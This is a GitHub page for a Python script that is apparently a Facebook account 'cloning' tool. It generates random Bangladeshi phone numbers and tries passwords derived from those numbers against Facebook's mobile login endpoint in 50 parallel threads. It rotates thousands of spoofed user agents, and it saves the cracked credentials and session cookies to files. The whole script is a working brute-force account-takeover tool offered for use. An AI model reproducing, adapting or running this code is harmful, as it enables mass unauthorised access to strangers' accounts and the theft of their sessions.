-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathDCCS-RNDM.py
246 lines (233 loc) · 9.6 KB
/
DCCS-RNDM.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
#DCCS TEAM
#USE THE SCRIPT AND GIVE CRADIT DCCS TEAM
import os,sys,time,json,random,re,string,platform,base64,uuid
os.system("git pull")
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
try:
import requests
from concurrent.futures import ThreadPoolExecutor as ThreadPool
import mechanize
from requests.exceptions import ConnectionError
except ModuleNotFoundError:
os.system('pip install mechanize requests futures bs4==2 > /dev/null')
os.system('pip install bs4')
#_______ APK __________
class jalan:
def __init__(self, z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.009)
P = '\x1b[1;97m'
M = '\x1b[1;91m'
H = '\x1b[1;92m'
K = '\x1b[1;93m'
B = '\x1b[1;94m'
U = '\x1b[1;95m'
O = '\x1b[1;96m'
N = '\x1b[0m'
Z = "\033[1;30m"
sir = '\033[41m\x1b[1;97m'
x = '\33[m' # DEFAULT
m = '\x1b[1;91m' #RED +
k = '\033[93m' # KUNING +
xr = '\x1b[1;92m' # HIJAU +
hh = '\033[32m' # HIJAU -
u = '\033[95m' # UNGU
kk = '\033[33m' # KUNING -
b = '\33[1;96m' # BIRU -
p = '\x1b[0;34m' # BIRU +
asu = random.choice([m,k,xr,u,b])
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
jh=[]
try:
janina = requests.get('https://raw.githubusercontent.com/Dccs-team/server/main/F').text
jh.append(janina)
except:
exit('[×] Turn On Your Internet And Run Again')
P = '\x1b[1;97m';M = '\x1b[1;91m';H = '\x1b[1;92m';K = '\x1b[1;93m';B = '\x1b[1;94m'
for i in jh:
a,b,c,d,e,f,g,h,pp,sv= i.split(';')[0],i.split(';')[1],i.split(';')[2],i.split(';')[3],i.split(';')[4],i.split(';')[5],i.split(';')[6],i.split(';')[7],i.split(';')[8],i.split(';')[9]
a1=(f"""│{H}{a}{P}│""");a2=(f"""│{H}{b}{P}│""");a3 =(f"""│{H}{c}{P}│""");a4 =(f"""│{K}{d}{P}│""");a5 =(f"""│{K}{e}{P}│""");a6 =(f"""│{P}{f}{P}│""");a7 =(f"""│{P}{g}{P}│""");a8 =(f"""│{P}{h}{P}│""");a0= 45*'‒'
aq=(f"""
┌━━━━━━━━━━━━━━━━━ DCCS TEAM ━━━━━━━━━━━━━━━━┑
┃ {H} CREATED BY : SAIMON.CYBER × MAK-GANG {P} ┃
┃ {H} FACEBOK : MURSALIN AHAMED KHAN ALIN{P} ┃
┃ {H} GITHUB : DCCS-TEAM {P} ┃
┃ {H} TOOL STATUS : TOOL IS {pp} {P} ┃
┃ {H} TEAM : DCCS {P} ┃
┃{H} TOOL VIRSION : 0.4 {P} ┃
┃ {H} TOOL WORK : DATA {P} ┃
└━━━━━━━━━━━━━━━━━ DCCS-TEAM ━━━━━━━━━━━━━━━━┘""")
logo=(f'┌{a0}┐\n{a1}\n{a2}\n{a3}\n{a4}\n{a5}\n{a6}\n{a7}\n{a8}\n└{a0}┘\n{aq}')
loop = 0
oks = []
cps = []
def clear():
os.system('clear')
print(logo)
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
a = ltx-12
tag = "PM"
else:
a = ltx
tag = "AM"
try:
print('\n\n\033[1;33mLoading asset files ... \033[0;97m')
v = 5.2
update = ('5.2')
update = ('5.2')
if str(v) in update:
os.system('clear')
else:pass
except:print('\n\033[1;31mNo internet connection ... \033[0;97m')
#global functions
def dynamic(text):
titik = ['. ','.. ','... ','.... ']
for o in titik:
print('\r'+text+o),
sys.stdout.flush();time.sleep(1)
#User agents
ugen2=[]
ugen=[]
for xd in range(10000):
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'])
c=' en-us; GT-'
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36'
uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
ugen.append(uaku2)
# APK CHECK
def xxr():
user=[]
twf =[]
os.getuid
os.geteuid
os.system("clear")
print(logo)
print(f' [{xr}^{x}] Example>: {xr}019,017,018,92302,92301,91778{x}')
print(" ══════════════════════════════════════════")
rk1 = '0171'
rk2 = '0172'
rk3 = '0175'
rk4 = '017'
code = random.choice([rk1,rk2,rk3]) # input(f' [{xr}■{x}] Choose : ')
os.system('clear')
print(logo)
limit = int(input(f'\033[0;97m[{xr}^{x}]\033[0;92m EXAMPLE : \033[0;93m10000, \x1b[38;5;208m20000, \033[0;92m50000 ] \n\033[0;95m═════════════════════════════════════════ \n\033[0;97m[{xr}^{x}] \033[0;92mPUT CLONING LIMIT:\033[0;93m '))
for nmbr in range(limit):
nmp = ''.join(random.choice(string.digits) for _ in range(7))
user.append(nmp)
os.system("clear")
print(logo)
passx = 0
HamiiID = []
print("")
for bilal in range(passx):
pww = input(f"[*] Enter Password {bilal+1} : ")
HamiiID.append(pww)
with ThreadPool(max_workers=50) as manshera:
clear()
tl = str(len(user))
jalan('\033[1;97m====================================================')
jalan(f'[{xr}^{x}]\x1b[38;5;208m YOUR TOTAL IDS: {xr}'+tl)
jalan(f'{x}[{xr}^{x}]\033[0;92m PLEASE WAIT YOUR CLONING PROCESS HAS BEEN STARTED')
jalan(f'\033[0;97m[{xr}^{x}]\033[0;93m USE YOUR MOBILE DATA ')
jalan(f'\033[0;97m[{xr}^{x}] \x1b[38;5;208mUse Flight Mode For Speed Up')
jalan(f'\033[0;97m[{xr}^{x}] \033[0;95mSuper Fast Speed Cloning')
jalan('\033[1;97m====================================================')
for love in user:
pwx = [love[1:]]
uid = code+love
for Eman in HamiiID:
pwx.append(Eman)
pwx.append(love)
manshera.submit(rcrack,uid,pwx,tl)
print(f"\n{x} ══════════════════════════════════════════")
def rcrack(uid,pwx,tl):
#print(user)
global loop
global cps
global oks
global proxy
try:
for ps in pwx:
pro = random.choice(ugen)
session = requests.Session()
free_fb = session.get('https://mbasic.facebook.com').text
log_data = {
"lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
"jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
"m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
"li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
"try_number":"0",
"unrecognized_tries":"0",
"email":uid,
"pass":ps,
"login":"Log In"}
header_freefb = {"authority": 'mbasic.facebook.com',
"method": 'GET',
"scheme": 'https',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',
'cache-control': 'max-age=0',
'sec-ch-ua': '"Chromium";v="107", "Not=A?Brand";v="24"',
'sec-ch-ua-mobile': '?1',
'sec-ch-ua-platform': '"Android"',
'sec-fetch-dest': 'document',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'none',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': pro}
lo = session.post('https://mbasic.facebook.com/login/device-based/login/async/?refsrc=deprecated&lwv=100',data=log_data,headers=header_freefb).text
log_cookies=session.cookies.get_dict().keys()
if 'c_user' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[7:22]
print('\r\r\033[1;32m[DCCS-OK💚] \033[1;32m'+uid+'\033[1;32m • \033[1;32m' +ps+ ' \n[🌺]\033[0;93m COOKIE = \033[1;32m'+coki+ ' '' \033[0;97m')
cek_apk(session,coki)
open('/sdcard/DCCS-OK.txt', 'a').write( uid+' • '+ps+'\n')
oks.append(cid)
break
elif 'checkpoint' in log_cookies:
coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
cid = coki[24:39]
#print('\r\r\33[1;30m[DCCS-CP] ' +uid+ ' • ' +ps+ ' \33[0;97m')
open('/sdcard/DCCS-CP.txt', 'a').write( uid+' | '+ps+' \n')
cps.append(cid)
break
else:
continue
loop+=1
sys.stdout.write(f'\r\r%s{x}[{xr}DCCS{x}][%s\%s][OK:{xr}%s{x}]'%(H,loop,tl,len(oks))),
sys.stdout.flush()
except:
pass
xxr()